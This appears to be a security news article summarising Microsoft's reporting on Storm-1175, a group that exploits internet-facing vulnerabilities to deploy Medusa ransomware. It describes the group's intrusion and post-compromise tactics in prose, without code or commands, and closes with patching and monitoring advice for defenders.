A sophisticated ransomware operation, identified by Microsoft as Storm-1175, is rapidly targeting organizations by exploiting vulnerabilities in internet-facing assets. The threat group utilizes the Medusa ransomware, achieving full network compromise in as little as 24 hours by striking during the critical window between vulnerability disclosure and patching. This aggressive approach, leveraging both known and previously undisclosed zero-day flaws, poses a significant and evolving threat to businesses globally, particularly those reliant on exposed applications like mail servers and file transfer tools.
Microsoft Threat Intelligence has been tracking Storm-1175 since 2023, observing their exploitation of over 16 known vulnerabilities across various enterprise platforms. What sets this group apart is their agility in exploiting so-called “N-day” vulnerabilities – flaws that have been publicly announced but remain unpatched across a substantial number of systems. The threat actors actively scan the internet for vulnerable applications, gaining initial access through even brief exposure periods. This rapid exploitation strategy allows them to deploy Medusa ransomware before defenders can adequately respond.
Storm-1175’s Exploitation of Zero-Day Flaws
Beyond exploiting known vulnerabilities, Microsoft analysts have confirmed Storm-1175’s capability to leverage zero-day flaws – vulnerabilities that are not yet publicly known or documented. This advanced tactic was demonstrated through the exploitation of CVE-2026-23760, a SmarterMail flaw, a full week before its official public disclosure. Similarly, the group exploited CVE-2025-10035 in Fortra’s GoAnywhere Managed File Transfer one week prior to its public announcement. This ability to exploit previously unknown vulnerabilities significantly amplifies the threat posed by Storm-1175, as standard patch management practices would not protect against these initial intrusions.
Medusa ransomware itself operates as a Ransomware-as-a-Service (RaaS) platform, where its developers lease the tools and infrastructure to affiliated groups such as Storm-1175. Medusa employs a double extortion model, not only encrypting victim data but also exfiltrating it. Attackers then threaten to publish the stolen data if a ransom is not paid, creating immense pressure on organizations by combining operational disruption with the long-term risk of sensitive data exposure to the public. This dual threat makes the Medusa ransomware particularly damaging.
Inside Storm-1175’s Post-Compromise Playbook
Once Storm-1175 infiltrates a target environment, their operations follow a consistent and rapid sequence of actions. The initial step typically involves planting a web shell or deploying a remote access payload. This code is designed to ensure persistent access to the compromised system, even if the original vulnerability is patched. Concurrently, the group establishes new user accounts to create backup access pathways into the network, guaranteeing continued access regardless of subsequent security efforts.
Following initial access and persistence, Storm-1175 utilizes legitimate remote monitoring and management (RMM) tools. This allows them to blend their malicious activities with normal IT traffic, making detection more challenging for security teams. To further hinder defenses, the attackers tamper with Microsoft Defender Antivirus settings by modifying the Windows registry, a step that necessitates elevated privileges. They also employ encoded PowerShell commands to add entire drives to the antivirus exclusion lists, effectively disabling security software from scanning for harmful files on those drives.
Credential theft is a critical component of the attackers’ playbook, targeting high-privilege accounts that are essential for deploying ransomware across the entire network. When the operation is ready to conclude, Storm-1175 uses Bandizip to compress collected files and Rclone to transfer this data to remote, attacker-controlled cloud storage. Subsequently, the tool PDQ Deployer is used to execute a script named “RunFileCopy.cmd,” which pushes the Medusa ransomware payloads to every accessible machine within the network. In some instances, to ensure a simultaneous and widespread deployment, the group leverages elevated privileges to trigger a Group Policy update, disseminating the ransomware across all domain-joined systems.
Microsoft and industry security researchers are urging organizations to prioritize patching internet-facing systems immediately, especially within a 72-hour window for any vulnerability listed in the CISA Known Exploited Vulnerabilities catalog. Security teams should enhance their monitoring for alerts related to credential theft, unauthorized registry modifications, and the creation of new user accounts, as these are strong indicators of an active compromise. Restricting the use of RMM tools to approved applications and enforcing multi-factor authentication for all privileged accounts are crucial mitigation steps. Regular audits of antivirus exclusion paths are also recommended to detect unauthorized changes before they can be weaponized by attackers.